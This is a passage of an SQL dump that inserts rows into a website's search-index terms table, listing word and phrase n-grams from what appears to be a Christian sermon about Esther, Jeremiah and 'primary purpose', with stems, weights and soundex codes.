(304052, 'are like', 'ar like', 0, 1, 1.2667, 'A642', 1, '*'),
(304053, 'are like esther', 'ar like esther', 0, 1, 1.5, 'A64236', 1, '*'),
(304054, 'are primary', 'ar primary', 0, 1, 1.3667, 'A61656', 1, '*'),
(304055, 'are primary purposes', 'ar primary purposes', 0, 1, 1.6667, 'A616561612', 1, '*'),
(304056, 'are right', 'ar right', 0, 1, 1.3, 'A623', 1, '*'),
(304057, 'are right now', 'ar right now', 0, 1, 1.4333, 'A6235', 1, '*'),
(304058, 'are secondary', 'ar secondary', 0, 1, 1.4333, 'A62536', 1, '*'),
(304059, 'are secondary purposes', 'ar secondary purposes', 0, 1, 1.7333, 'A625361612', 1, '*'),
(304060, 'are things', 'ar things', 0, 1, 1.3333, 'A6352', 1, '*'),
(304061, 'are things connected', 'ar things connected', 0, 1, 1.6667, 'A6352523', 1, '*'),
(304062, 'are you actually', 'ar you actually', 0, 1, 1.5333, 'A6234', 1, '*'),
(304063, 'as secondary', 'as secondary', 0, 1, 1.4, 'A2536', 1, '*'),
(304064, 'as secondary purposes', 'as secondary purposes', 0, 1, 1.7, 'A25361612', 1, '*'),
(304065, 'as this esther', 'as this esther', 0, 1, 1.4667, 'A23236', 1, '*'),
(304066, 'as well', 'as well', 0, 1, 1.2333, 'A240', 1, '*'),
(304067, 'as well as', 'as well as', 0, 1, 1.3333, 'A242', 1, '*'),
(304068, 'attention from', 'attent from', 0, 1, 1.4667, 'A3535165', 1, '*'),
(304069, 'attention from the', 'attent from the', 0, 1, 1.6, 'A35351653', 1, '*'),
(304070, 'attention to your', 'attent to your', 0, 1, 1.5667, 'A353536', 1, '*'),
(304071, 'authority that', 'author that', 0, 1, 1.4667, 'A363', 1, '*'),
(304072, 'authority that position', 'author that position', 0, 1, 1.7667, 'A3631235', 1, '*'),
(304073, 'bad become', 'bad become', 0, 1, 1.3333, 'B3125', 1, '*'),
(304074, 'bad become anything', 'bad become anything', 0, 1, 1.6333, 'B3125352', 1, '*'),
(304075, 'be a saviour', 'be a saviour', 0, 1, 1.4, 'B216', 1, '*'),
(304076, 'be you', 'be you', 0, 1, 1.2, 'B000', 1, '*'),
(304077, 'be you are', 'be you are', 0, 1, 1.3333, 'B600', 1, '*'),
(304078, 'became the', 'becam the', 0, 1, 1.3333, 'B253', 1, '*'),
(304079, 'became the prime', 'becam the prime', 0, 1, 1.5333, 'B253165', 1, '*'),
(304080, 'because that was', 'becaus that was', 0, 1, 1.5333, 'B232', 1, '*'),
(304081, 'because they have', 'becaus they have', 0, 1, 1.5667, 'B231', 1, '*'),
(304082, 'become anything', 'becom anything', 0, 1, 1.5, 'B25352', 1, '*'),
(304083, 'become anything outside', 'becom anything outside', 0, 1, 1.7667, 'B25352323', 1, '*'),
(304084, 'been correctly', 'been correctly', 0, 1, 1.4667, 'B526234', 1, '*'),
(304085, 'been correctly utilized', 'been correctly utilized', 0, 1, 1.7667, 'B5262343423', 1, '*'),
(304086, 'been withdrawn', 'been withdrawn', 0, 1, 1.4667, 'B5365', 1, '*'),
(304087, 'been withdrawn from', 'been withdrawn from', 0, 1, 1.6333, 'B5365165', 1, '*'),
(304088, 'before i', 'befor i', 0, 1, 1.2667, 'B600', 1, '*'),
(304089, 'before i formed', 'befor i formed', 0, 1, 1.5, 'B61653', 1, '*'),
(304090, 'before thou', 'befor thou', 0, 1, 1.3667, 'B630', 1, '*'),
(304091, 'before thou camest', 'befor thou camest', 0, 1, 1.6, 'B632523', 1, '*'),
(304092, 'being a prophet', 'be a prophet', 0, 1, 1.5, 'B521613', 1, '*'),
(304093, 'being a queen', 'be a queen', 0, 1, 1.4333, 'B525', 1, '*'),
(304094, 'being a saviour', 'be a saviour', 0, 1, 1.5, 'B5216', 1, '*'),
(304095, 'belly', 'belli', 0, 0, 0.3333, 'B400', 1, '*'),
(304096, 'belly i', 'belli i', 0, 1, 1.2333, 'B400', 1, '*'),
(304097, 'belly i knew', 'belli i knew', 0, 1, 1.4, 'B425', 1, '*'),
(304098, 'beloved what', 'belov what', 0, 1, 1.4, 'B413', 1, '*'),
(304099, 'beloved what is', 'belov what is', 0, 1, 1.5, 'B4132', 1, '*'),
(304100, 'but his primary', 'but his primary', 0, 1, 1.5, 'B321656', 1, '*'),
(304101, 'but that was', 'but that was', 0, 1, 1.4, 'B320', 1, '*'),
(304102, 'but the voice', 'but the voice', 0, 1, 1.4333, 'B312', 1, '*'),
(304103, 'camest', 'camest', 0, 0, 0.4, 'C523', 1, '*'),
(304104, 'camest forth', 'camest forth', 0, 1, 1.4, 'C523163', 1, '*'),
(304105, 'camest forth out', 'camest forth out', 0, 1, 1.5333, 'C523163', 1, '*'),
(304106, 'cancel his', 'cancel his', 0, 1, 1.3333, 'C5242', 1, '*'),
(304107, 'cancel his primary', 'cancel his primary', 0, 1, 1.6, 'C52421656', 1, '*'),
(304108, 'city that', 'citi that', 0, 1, 1.3, 'C300', 1, '*'),
(304109, 'city that place', 'citi that place', 0, 1, 1.5, 'C3142', 1, '*'),
(304110, 'comes with', 'come with', 0, 1, 1.3333, 'C523', 1, '*'),
(304111, 'comes with two', 'come with two', 0, 1, 1.4667, 'C523', 1, '*'),
(304112, 'commitment', 'commit', 0, 0, 0.6667, 'C5353', 2, '*'),
(304113, 'commitment has', 'commit has', 0, 1, 1.4667, 'C53532', 1, '*'),
(304114, 'commitment has also', 'commit has also', 0, 1, 1.6333, 'C5353242', 1, '*'),
(304115, 'commitment of', 'commit of', 0, 1, 1.4333, 'C53531', 1, '*'),
(304116, 'commitment of god', 'commit of god', 0, 1, 1.5667, 'C5353123', 1, '*'),
(304117, 'commitment of heaven', 'commit of heaven', 0, 1, 1.6667, 'C535315', 1, '*'),
(304118, 'committed to financing', 'commit to financing', 0, 1, 1.7333, 'C5315252', 1, '*'),
(304119, 'commltted', 'commlt', 0, 0, 0.6, 'C543', 1, '*'),
(304120, 'commltted to', 'commlt to', 0, 1, 1.4, 'C543', 1, '*'),
(304121, 'commltted to financing', 'commlt to financing', 0, 1, 1.7333, 'C54315252', 1, '*'),
(304122, 'compromising or', 'compromis or', 0, 1, 1.5, 'C51652526', 1, '*'),
(304123, 'compromising or giving', 'compromis or giving', 0, 1, 1.7333, 'C516525262152', 1, '*'),
(304124, 'connected to the', 'connect to the', 0, 1, 1.5333, 'C523', 1, '*'),
(304125, 'contributing', 'contribut', 0, 0, 0.8, 'C5361352', 1, '*'),
(304126, 'contributing to', 'contribut to', 0, 1, 1.5, 'C53613523', 1, '*'),
(304127, 'contributing to what', 'contribut to what', 0, 1, 1.6667, 'C53613523', 1, '*'),
(304128, 'correctly utilized', 'correctli utilized', 0, 1, 1.6, 'C62343423', 1, '*'),
(304129, 'correctly utilized beloved', 'correctli utilized beloved', 0, 1, 1.8667, 'C623434231413', 1, '*'),
(304130, 'country', 'countri', 0, 0, 0.4667, 'C536', 1, '*'),
(304131, 'country state', 'countri state', 0, 1, 1.4333, 'C53623', 1, '*'),
(304132, 'country state or', 'countri state or', 0, 1, 1.5333, 'C536236', 1, '*'),
(304133, 'cross although', 'cross although', 0, 1, 1.4667, 'C62432', 1, '*'),
(304134, 'cross although he', 'cross although he', 0, 1, 1.5667, 'C62432', 1, '*'),
(304135, 'dead but', 'dead but', 0, 1, 1.2667, 'D130', 1, '*'),
(304136, 'dead but his', 'dead but his', 0, 1, 1.4, 'D132', 1, '*'),
(304137, 'did not mind', 'did not mind', 0, 1, 1.4, 'D5353', 1, '*'),
(304138, 'did so', 'did so', 0, 1, 1.2, 'D200', 1, '*'),
(304139, 'did so many', 'did so many', 0, 1, 1.3667, 'D250', 1, '*'),
(304140, 'die on', 'die on', 0, 1, 1.2, 'D500', 1, '*'),
(304141, 'die on the', 'die on the', 0, 1, 1.3333, 'D530', 1, '*'),
(304142, 'difficulties', 'difficulti', 0, 0, 0.8, 'D12432', 1, '*'),
(304143, 'difficulties and', 'difficulti and', 0, 1, 1.5333, 'D1243253', 1, '*'),
(304144, 'difficulties and struggle', 'difficulti and struggle', 0, 1, 1.8333, 'D124325323624', 1, '*'),
(304145, 'direction a', 'direct a', 0, 1, 1.3667, 'D6235', 1, '*'),
(304146, 'direction a lot', 'direct a lot', 0, 1, 1.5, 'D623543', 1, '*'),
(304147, 'divine funding', 'divin funding', 0, 1, 1.4667, 'D1515352', 1, '*'),
(304148, 'divine funding and', 'divin funding and', 0, 1, 1.6, 'D151535253', 1, '*'),
(304149, 'doing in', 'do in', 0, 1, 1.2667, 'D525', 1, '*'),
(304150, 'doing in his', 'do in his', 0, 1, 1.4, 'D5252', 1, '*'),
(304151, 'drove', 'drove', 0, 0, 0.3333, 'D610', 1, '*'),
(304152, 'drove him', 'drove him', 0, 1, 1.3, 'D615', 1, '*'),
(304153, 'drove him until', 'drove him until', 0, 1, 1.5, 'D61534', 1, '*'),
(304154, 'e those', 'e those', 0, 1, 1.2333, 'E320', 1, '*'),
(304155, 'e those things', 'e those things', 0, 1, 1.4667, 'E32352', 1, '*'),
(304156, 'egypt but that', 'egypt but that', 0, 1, 1.4667, 'E21313', 1, '*'),
(304157, 'enjoyed', 'enjoi', 0, 0, 0.4667, 'E523', 1, '*'),
(304158, 'enjoyed the', 'enjoi the', 0, 1, 1.3667, 'E523', 1, '*'),
(304159, 'enjoyed the commitment', 'enjoi the commitment', 0, 1, 1.7333, 'E52325353', 1, '*'),
(304160, 'enjoying', 'enjoi', 0, 0, 0.5333, 'E5252', 1, '*'),
(304161, 'enjoying the', 'enjoi the', 0, 1, 1.4, 'E52523', 1, '*'),
(304162, 'enjoying the affluence', 'enjoi the affluence', 0, 1, 1.7333, 'E525231452', 1, '*'),
(304163, 'enjoying the secondary', 'enjoi the secondary', 0, 1, 1.7333, 'E525232536', 1, '*'),
(304164, 'esther', 'esther', 0, 0, 0.4, 'E236', 2, '*'),
(304165, 'esther almost', 'esther almost', 0, 1, 1.4333, 'E2364523', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(304166, 'esther almost missed', 'esther almost missed', 0, 1, 1.6667, 'E2364523523', 1, '*'),
(304167, 'esther who', 'esther who', 0, 1, 1.3333, 'E236', 1, '*'),
(304168, 'esther who god', 'esther who god', 0, 1, 1.4667, 'E23623', 1, '*'),
(304169, 'every other things', 'everi other things', 0, 1, 1.6, 'E1636352', 1, '*'),
(304170, 'every position', 'everi position', 0, 1, 1.4667, 'E161235', 1, '*'),
(304171, 'every position and', 'everi position and', 0, 1, 1.6, 'E1612353', 1, '*'),
(304172, 'exactly you', 'exactli you', 0, 1, 1.3667, 'E234', 1, '*'),
(304173, 'exactly you are', 'exactli you are', 0, 1, 1.5, 'E2346', 1, '*'),
(304174, 'face difficulties', 'face difficulties', 0, 1, 1.5667, 'F2312432', 1, '*'),
(304175, 'face difficulties and', 'face difficulties and', 0, 1, 1.7, 'F231243253', 1, '*'),
(304176, 'failed because that', 'fail because that', 0, 1, 1.6333, 'F43123', 1, '*'),
(304177, 'father in her', 'father in her', 0, 1, 1.4333, 'F3656', 1, '*'),
(304178, 'father\'s heart 11', 'father heart 11', 0, 1, 1.5667, 'F36263', 1, '*'),
(304179, 'finance', 'financ', 0, 0, 0.4667, 'F520', 1, '*'),
(304180, 'finance a', 'financ a', 0, 1, 1.3, 'F520', 1, '*'),
(304181, 'finance a secondary', 'financ a secondary', 0, 1, 1.6333, 'F52536', 1, '*'),
(304182, 'financing', 'financ', 0, 0, 0.6, 'F5252', 1, '*'),
(304183, 'financing and', 'financ and', 0, 1, 1.4333, 'F525253', 1, '*'),
(304184, 'financing and funding', 'financ and funding', 0, 1, 1.7, 'F52525315352', 1, '*'),
(304185, 'focused on', 'focus on', 0, 1, 1.3333, 'F235', 1, '*'),
(304186, 'focused on fulfilling', 'focus on fulfilling', 0, 1, 1.7, 'F235141452', 1, '*'),
(304187, 'for such', 'for such', 0, 1, 1.2667, 'F620', 2, '*'),
(304188, 'for such a', 'for such a', 0, 1, 1.3333, 'F620', 2, '*'),
(304189, 'formed thee', 'form thee', 0, 1, 1.3667, 'F653', 1, '*'),
(304190, 'formed thee in', 'form thee in', 0, 1, 1.4667, 'F6535', 1, '*'),
(304191, 'forth out', 'forth out', 0, 1, 1.3, 'F630', 1, '*'),
(304192, 'forth out of', 'forth out of', 0, 1, 1.4, 'F631', 1, '*'),
(304193, 'from the primary', 'from the primary', 0, 1, 1.5333, 'F6531656', 1, '*'),
(304194, 'from their lives', 'from their lives', 0, 1, 1.5333, 'F6536412', 1, '*'),
(304195, 'fulfilled that', 'fulfil that', 0, 1, 1.4667, 'F4143', 1, '*'),
(304196, 'fulfilled that 1', 'fulfil that 1', 0, 1, 1.5333, 'F4143', 1, '*'),
(304197, 'fulfilled the', 'fulfil the', 0, 1, 1.4333, 'F4143', 1, '*'),
(304198, 'fulfilled the primary', 'fulfil the primary', 0, 1, 1.7, 'F41431656', 1, '*'),
(304199, 'fulfilling the', 'fulfil the', 0, 1, 1.4667, 'F414523', 1, '*'),
(304200, 'fulfilling the primary', 'fulfil the primary', 0, 1, 1.7333, 'F4145231656', 1, '*'),
(304201, 'fund', 'fund', 0, 0, 0.2667, 'F530', 1, '*'),
(304202, 'fund and', 'fund and', 0, 1, 1.2667, 'F5353', 1, '*'),
(304203, 'fund and finance', 'fund and finance', 0, 1, 1.5333, 'F5353152', 1, '*'),
(304204, 'funding', 'fund', 0, 0, 0.4667, 'F5352', 1, '*'),
(304205, 'funding and', 'fund and', 0, 1, 1.3667, 'F535253', 1, '*'),
(304206, 'funding and commitment', 'fund and commitment', 0, 1, 1.7333, 'F53525325353', 1, '*'),
(304207, 'funding your', 'fund your', 0, 1, 1.4, 'F53526', 1, '*'),
(304208, 'funding your primary', 'fund your primary', 0, 1, 1.6667, 'F535261656', 1, '*'),
(304209, 'generation every', 'gener every', 0, 1, 1.5333, 'G563516', 1, '*'),
(304210, 'generation every other', 'gener every other', 0, 1, 1.7333, 'G56351636', 1, '*'),
(304211, 'gives in', 'give in', 0, 1, 1.2667, 'G125', 1, '*'),
(304212, 'gives in life', 'give in life', 0, 1, 1.4333, 'G12541', 1, '*'),
(304213, 'giving less', 'give less', 0, 1, 1.3667, 'G15242', 1, '*'),
(304214, 'giving less attention', 'give less attention', 0, 1, 1.7, 'G152423535', 1, '*'),
(304215, 'god are things', 'god are things', 0, 1, 1.4667, 'G36352', 1, '*'),
(304216, 'god did', 'god did', 0, 1, 1.2333, 'G300', 1, '*'),
(304217, 'god did not', 'god did not', 0, 1, 1.3667, 'G353', 1, '*'),
(304218, 'god gives in', 'god gives in', 0, 1, 1.4, 'G32125', 1, '*'),
(304219, 'god has allowed', 'god has allowed', 0, 1, 1.5, 'G3243', 1, '*'),
(304220, 'god he would', 'god he would', 0, 1, 1.4, 'G343', 1, '*'),
(304221, 'god in a', 'god in a', 0, 1, 1.2667, 'G350', 1, '*'),
(304222, 'god is commltted', 'god is commltted', 0, 1, 1.5333, 'G32543', 1, '*'),
(304223, 'god is doing', 'god is doing', 0, 1, 1.4, 'G32352', 1, '*'),
(304224, 'god there you', 'god there you', 0, 1, 1.4333, 'G360', 1, '*'),
(304225, 'got it right', 'got it right', 0, 1, 1.4, 'G3623', 1, '*'),
(304226, 'has allowed', 'ha allowed', 0, 1, 1.3667, 'H243', 1, '*'),
(304227, 'has allowed into', 'ha allowed into', 0, 1, 1.5333, 'H24353', 1, '*'),
(304228, 'has also', 'ha also', 0, 1, 1.2667, 'H242', 1, '*'),
(304229, 'has also been', 'ha also been', 0, 1, 1.4333, 'H24215', 1, '*'),
(304230, 'has been correctly', 'ha been correctly', 0, 1, 1.6, 'H21526234', 1, '*'),
(304231, 'have failed', 'have failed', 0, 1, 1.3667, 'H143', 1, '*'),
(304232, 'have failed because', 'have failed because', 0, 1, 1.6333, 'H14312', 1, '*'),
(304233, 'have shifted', 'have shifted', 0, 1, 1.4, 'H1213', 1, '*'),
(304234, 'have shifted their', 'have shifted their', 0, 1, 1.6, 'H12136', 1, '*'),
(304235, 'he did so', 'he did so', 0, 1, 1.3, 'H320', 1, '*'),
(304236, 'he enjoyed', 'he enjoyed', 0, 1, 1.3333, 'H523', 1, '*'),
(304237, 'he enjoyed the', 'he enjoyed the', 0, 1, 1.4667, 'H523', 1, '*'),
(304238, 'he focused', 'he focused', 0, 1, 1.3333, 'H123', 1, '*'),
(304239, 'he focused on', 'he focused on', 0, 1, 1.4333, 'H1235', 1, '*'),
(304240, 'he fulfilled', 'he fulfilled', 0, 1, 1.4, 'H14143', 1, '*'),
(304241, 'he fulfilled that', 'he fulfilled that', 0, 1, 1.5667, 'H14143', 1, '*'),
(304242, 'he told jeremiah', 'he told jeremiah', 0, 1, 1.5333, 'H343265', 1, '*'),
(304243, 'he understood', 'he understood', 0, 1, 1.4333, 'H53623', 1, '*'),
(304244, 'he understood that', 'he understood that', 0, 1, 1.6, 'H53623', 1, '*'),
(304245, 'he would have', 'he would have', 0, 1, 1.4333, 'H431', 1, '*'),
(304246, 'healing', 'heal', 0, 0, 0.4667, 'H452', 2, '*'),
(304247, 'healing the', 'heal the', 0, 1, 1.3667, 'H4523', 1, '*'),
(304248, 'healing the sick', 'heal the sick', 0, 1, 1.5333, 'H45232', 1, '*'),
(304249, 'heart 11', 'heart 11', 0, 1, 1.2667, 'H630', 1, '*'),
(304250, 'heart 11 06', 'heart 11 06', 0, 1, 1.3667, 'H630', 1, '*'),
(304251, 'heaven are', 'heaven are', 0, 1, 1.3333, 'H156', 1, '*'),
(304252, 'heaven are always', 'heaven are always', 0, 1, 1.5667, 'H15642', 1, '*'),
(304253, 'heaven he', 'heaven he', 0, 1, 1.3, 'H150', 1, '*'),
(304254, 'heaven he focused', 'heaven he focused', 0, 1, 1.5667, 'H15123', 1, '*'),
(304255, 'helped', 'help', 0, 0, 0.4, 'H413', 1, '*'),
(304256, 'helped her', 'help her', 0, 1, 1.3333, 'H4136', 1, '*'),
(304257, 'helped her and', 'help her and', 0, 1, 1.4667, 'H413653', 1, '*'),
(304258, 'her and', 'her and', 0, 1, 1.2333, 'H653', 1, '*'),
(304259, 'her and she', 'her and she', 0, 1, 1.3667, 'H6532', 1, '*'),
(304260, 'her life', 'her life', 0, 1, 1.2667, 'H641', 1, '*'),
(304261, 'her life mordecai', 'her life mordecai', 0, 1, 1.5667, 'H6415632', 1, '*'),
(304262, 'her people', 'her people', 0, 1, 1.3333, 'H614', 1, '*'),
(304263, 'her people while', 'her people while', 0, 1, 1.5333, 'H614', 1, '*'),
(304264, 'him enjoying', 'him enjoying', 0, 1, 1.4, 'H5252', 1, '*'),
(304265, 'him enjoying the', 'him enjoying the', 0, 1, 1.5333, 'H52523', 1, '*'),
(304266, 'him until', 'him until', 0, 1, 1.3, 'H534', 1, '*'),
(304267, 'him until he', 'him until he', 0, 1, 1.4, 'H534', 1, '*'),
(304268, 'his generation', 'hi generation', 0, 1, 1.4667, 'H25635', 1, '*'),
(304269, 'his generation every', 'hi generation every', 0, 1, 1.6667, 'H2563516', 1, '*'),
(304270, 'his primary', 'hi primary', 0, 1, 1.3667, 'H21656', 1, '*'),
(304271, 'his primary purpose', 'hi primary purpose', 0, 1, 1.6333, 'H216561612', 1, '*'),
(304272, 'his way to', 'hi way to', 0, 1, 1.3333, 'H230', 1, '*'),
(304273, 'i e those', 'i e those', 0, 1, 1.3, 'I320', 1, '*'),
(304274, 'i formed', 'i formed', 0, 1, 1.2667, 'I1653', 1, '*'),
(304275, 'i formed thee', 'i formed thee', 0, 1, 1.4333, 'I1653', 1, '*'),
(304276, 'i knew', 'i knew', 0, 1, 1.2, 'I250', 1, '*'),
(304277, 'i knew thee', 'i knew thee', 0, 1, 1.3667, 'I253', 1, '*'),
(304278, 'i ordained', 'i ordained', 0, 1, 1.3333, 'I6353', 1, '*'),
(304279, 'i ordained thee', 'i ordained thee', 0, 1, 1.5, 'I6353', 1, '*'),
(304280, 'i ordained you', 'i ordained you', 0, 1, 1.4667, 'I6353', 1, '*'),
(304281, 'i sanctified', 'i sanctified', 0, 1, 1.4, 'I252313', 1, '*'),
(304282, 'i sanctified thee', 'i sanctified thee', 0, 1, 1.5667, 'I252313', 1, '*'),
(304283, 'i told', 'i told', 0, 1, 1.2, 'I343', 2, '*'),
(304284, 'i told you', 'i told you', 0, 1, 1.3333, 'I343', 1, '*'),
(304285, 'if jeremiah', 'if jeremiah', 0, 1, 1.3667, 'I1265', 1, '*'),
(304286, 'if jeremiah bad', 'if jeremiah bad', 0, 1, 1.5, 'I126513', 1, '*'),
(304287, 'in a man\'s', 'in a man', 0, 1, 1.3333, 'I520', 1, '*'),
(304288, 'in her life', 'in her life', 0, 1, 1.3667, 'I5641', 1, '*'),
(304289, 'in his generation', 'in his generation', 0, 1, 1.5667, 'I525635', 1, '*'),
(304290, 'in life comes', 'in life comes', 0, 1, 1.4333, 'I541252', 1, '*'),
(304291, 'in that country', 'in that country', 0, 1, 1.5, 'I532536', 1, '*'),
(304292, 'in that direction', 'in that direction', 0, 1, 1.5667, 'I536235', 1, '*'),
(304293, 'in the belly', 'in the belly', 0, 1, 1.4, 'I5314', 1, '*'),
(304294, 'in this kingdom', 'in this kingdom', 0, 1, 1.5, 'I5325235', 1, '*'),
(304295, 'influence and', 'influenc and', 0, 1, 1.4333, 'I5145253', 1, '*'),
(304296, 'influence and affluence', 'influenc and affluence', 0, 1, 1.7667, 'I51452531452', 1, '*'),
(304297, 'influence has', 'influenc has', 0, 1, 1.4333, 'I51452', 1, '*'),
(304298, 'influence has been', 'influenc has been', 0, 1, 1.6, 'I5145215', 1, '*'),
(304299, 'influence is', 'influenc is', 0, 1, 1.4, 'I51452', 2, '*'),
(304300, 'influence is the', 'influenc is the', 0, 1, 1.5333, 'I514523', 1, '*'),
(304301, 'into the kingdom', 'into the kingdom', 0, 1, 1.5333, 'I5325235', 1, '*'),
(304302, 'is always towards', 'is always towards', 0, 1, 1.5667, 'I2423632', 1, '*'),
(304303, 'is commltted', 'is commltted', 0, 1, 1.4, 'I2543', 1, '*'),
(304304, 'is commltted to', 'is commltted to', 0, 1, 1.5, 'I2543', 1, '*'),
(304305, 'is doing in', 'is doing in', 0, 1, 1.3667, 'I23525', 1, '*'),
(304306, 'is the secondary', 'is the secondary', 0, 1, 1.5333, 'I232536', 1, '*'),
(304307, 'is to die', 'is to die', 0, 1, 1.3, 'I230', 1, '*'),
(304308, 'it but', 'it but', 0, 1, 1.2, 'I313', 1, '*'),
(304309, 'it but the', 'it but the', 0, 1, 1.3333, 'I313', 1, '*'),
(304310, 'it right she', 'it right she', 0, 1, 1.4, 'I36232', 1, '*'),
(304311, 'item 51', 'item 51', 0, 1, 1.2333, 'I350', 1, '*'),
(304312, 'item 51 god', 'item 51 god', 0, 1, 1.3667, 'I3523', 1, '*'),
(304313, 'jeremiah bad', 'jeremiah bad', 0, 1, 1.4, 'J6513', 1, '*'),
(304314, 'jeremiah bad become', 'jeremiah bad become', 0, 1, 1.6333, 'J6513125', 1, '*'),
(304315, 'jeremiah i', 'jeremiah i', 0, 1, 1.3333, 'J650', 1, '*'),
(304316, 'jeremiah i ordained', 'jeremiah i ordained', 0, 1, 1.6333, 'J656353', 1, '*'),
(304317, 'jeremiah l', 'jeremiah l', 0, 1, 1.3333, 'J654', 1, '*'),
(304318, 'jeremiah l s', 'jeremiah l s', 0, 1, 1.4, 'J6542', 1, '*'),
(304319, 'jesus ow', 'jesu ow', 0, 1, 1.2667, 'J000', 1, '*'),
(304320, 'jesus ow saviour', 'jesu ow saviour', 0, 1, 1.5333, 'J160', 1, '*'),
(304321, 'joseph became', 'joseph became', 0, 1, 1.4333, 'J125', 1, '*'),
(304322, 'joseph became the', 'joseph became the', 0, 1, 1.5667, 'J1253', 1, '*'),
(304323, 'k2 item 51', 'k2 item 51', 0, 1, 1.3333, 'K350', 1, '*'),
(304324, 'kingdom for', 'kingdom for', 0, 1, 1.3667, 'K523516', 2, '*'),
(304325, 'kingdom for such', 'kingdom for such', 0, 1, 1.5333, 'K5235162', 2, '*'),
(304326, 'kingdom there', 'kingdom there', 0, 1, 1.4333, 'K523536', 1, '*'),
(304327, 'kingdom there are', 'kingdom there are', 0, 1, 1.5667, 'K523536', 1, '*'),
(304328, 'knew thee', 'knew thee', 0, 1, 1.3, 'K530', 1, '*'),
(304329, 'knew thee and', 'knew thee and', 0, 1, 1.4333, 'K5353', 1, '*'),
(304330, 'knewwhat', 'knewwhat', 0, 0, 0.5333, 'K530', 1, '*'),
(304331, 'knewwhat his', 'knewwhat his', 0, 1, 1.4, 'K532', 1, '*'),
(304332, 'knewwhat his primary', 'knewwhat his primary', 0, 1, 1.6667, 'K5321656', 1, '*'),
(304333, 'l', 'l', 0, 0, 0.0667, 'L000', 1, '*'),
(304334, 'l s', 'l s', 0, 1, 1.1, 'L200', 1, '*'),
(304335, 'l s before', 'l s before', 0, 1, 1.3333, 'L216', 1, '*'),
(304336, 'land jesus', 'land jesus', 0, 1, 1.3333, 'L532', 1, '*'),
(304337, 'land jesus ow', 'land jesus ow', 0, 1, 1.4333, 'L532', 1, '*'),
(304338, 'late may', 'late may', 0, 1, 1.2667, 'L350', 1, '*'),
(304339, 'late may be', 'late may be', 0, 1, 1.3667, 'L351', 1, '*'),
(304340, 'less attention', 'less attention', 0, 1, 1.4667, 'L23535', 1, '*'),
(304341, 'less attention to', 'less attention to', 0, 1, 1.5667, 'L235353', 1, '*'),
(304342, 'life and see', 'life and see', 0, 1, 1.4, 'L1532', 1, '*'),
(304343, 'life comes', 'life comes', 0, 1, 1.3333, 'L1252', 1, '*'),
(304344, 'life comes with', 'life comes with', 0, 1, 1.5, 'L12523', 1, '*'),
(304345, 'life i e', 'life i e', 0, 1, 1.2667, 'L100', 1, '*'),
(304346, 'life mordecai', 'life mordecai', 0, 1, 1.4333, 'L15632', 1, '*'),
(304347, 'life mordecai helped', 'life mordecai helped', 0, 1, 1.6667, 'L15632413', 1, '*'),
(304348, 'life of a', 'life of a', 0, 1, 1.3, 'L100', 1, '*'),
(304349, 'life the primary', 'life the primary', 0, 1, 1.5333, 'L131656', 1, '*'),
(304350, 'like esther', 'like esther', 0, 1, 1.3667, 'L236', 1, '*'),
(304351, 'like esther who', 'like esther who', 0, 1, 1.5, 'L236', 1, '*'),
(304352, 'like healing', 'like healing', 0, 1, 1.4, 'L2452', 1, '*'),
(304353, 'like healing the', 'like healing the', 0, 1, 1.5333, 'L24523', 1, '*'),
(304354, 'lives joseph', 'live joseph', 0, 1, 1.4, 'L121', 1, '*'),
(304355, 'lives joseph became', 'live joseph became', 0, 1, 1.6333, 'L12125', 1, '*'),
(304356, 'make necessary', 'make necessary', 0, 1, 1.4667, 'M2526', 1, '*'),
(304357, 'make necessary adjustments', 'make necessary adjustments', 0, 1, 1.8667, 'M2526323532', 1, '*'),
(304358, 'man is always', 'man is always', 0, 1, 1.4333, 'M242', 1, '*'),
(304359, 'man\'s life', 'man life', 0, 1, 1.3333, 'M241', 1, '*'),
(304360, 'man\'s life i', 'man life i', 0, 1, 1.4, 'M241', 1, '*'),
(304361, 'many other', 'mani other', 0, 1, 1.3333, 'M360', 1, '*'),
(304362, 'many other things', 'mani other things', 0, 1, 1.5667, 'M36352', 1, '*'),
(304363, 'may be you', 'mai be you', 0, 1, 1.3333, 'M100', 1, '*'),
(304364, 'mind him', 'mind him', 0, 1, 1.2667, 'M350', 1, '*'),
(304365, 'mind him enjoying', 'mind him enjoying', 0, 1, 1.5667, 'M35252', 1, '*'),
(304366, 'mind you', 'mind you', 0, 1, 1.2667, 'M300', 1, '*'),
(304367, 'mind you enjoying', 'mind you enjoying', 0, 1, 1.5667, 'M35252', 1, '*'),
(304368, 'minister in', 'minist in', 0, 1, 1.3667, 'M2365', 1, '*'),
(304369, 'minister in egypt', 'minist in egypt', 0, 1, 1.5667, 'M2365213', 1, '*'),
(304370, 'missed it but', 'miss it but', 0, 1, 1.4333, 'M2313', 1, '*'),
(304371, 'mordecai', 'mordecai', 0, 0, 0.5333, 'M632', 2, '*'),
(304372, 'mordecai helped', 'mordecai helped', 0, 1, 1.5, 'M632413', 1, '*'),
(304373, 'mordecai helped her', 'mordecai helped her', 0, 1, 1.6333, 'M6324136', 1, '*'),
(304374, 'nations if', 'nation if', 0, 1, 1.3333, 'N3521', 1, '*'),
(304375, 'nations if jeremiah', 'nation if jeremiah', 0, 1, 1.6333, 'N3521265', 1, '*'),
(304376, 'nations in', 'nation in', 0, 1, 1.3333, 'N3525', 1, '*'),
(304377, 'nations in this', 'nation in this', 0, 1, 1.5, 'N352532', 1, '*'),
(304378, 'necessary adjustments', 'necessari adjustments', 0, 1, 1.7, 'N26323532', 1, '*'),
(304379, 'necessary adjustments till', 'necessari adjustments till', 0, 1, 1.8667, 'N2632353234', 1, '*'),
(304380, 'not fund', 'not fund', 0, 1, 1.2667, 'N3153', 1, '*'),
(304381, 'not fund and', 'not fund and', 0, 1, 1.4, 'N315353', 1, '*'),
(304382, 'not mind', 'not mind', 0, 1, 1.2667, 'N353', 1, '*'),
(304383, 'not mind him', 'not mind him', 0, 1, 1.4, 'N3535', 1, '*'),
(304384, 'not mind you', 'not mind you', 0, 1, 1.4, 'N353', 1, '*'),
(304385, 'now in that', 'now in that', 0, 1, 1.3667, 'N300', 1, '*'),
(304386, 'obedience because', 'obedi because', 0, 1, 1.5667, 'O135212', 1, '*'),
(304387, 'obedience because they', 'obedi because they', 0, 1, 1.7333, 'O1352123', 1, '*'),
(304388, 'of authority', 'of authority', 0, 1, 1.4, 'O1363', 1, '*'),
(304389, 'of authority that', 'of authority that', 0, 1, 1.5667, 'O1363', 1, '*'),
(304390, 'of being', 'of being', 0, 1, 1.2667, 'O152', 1, '*'),
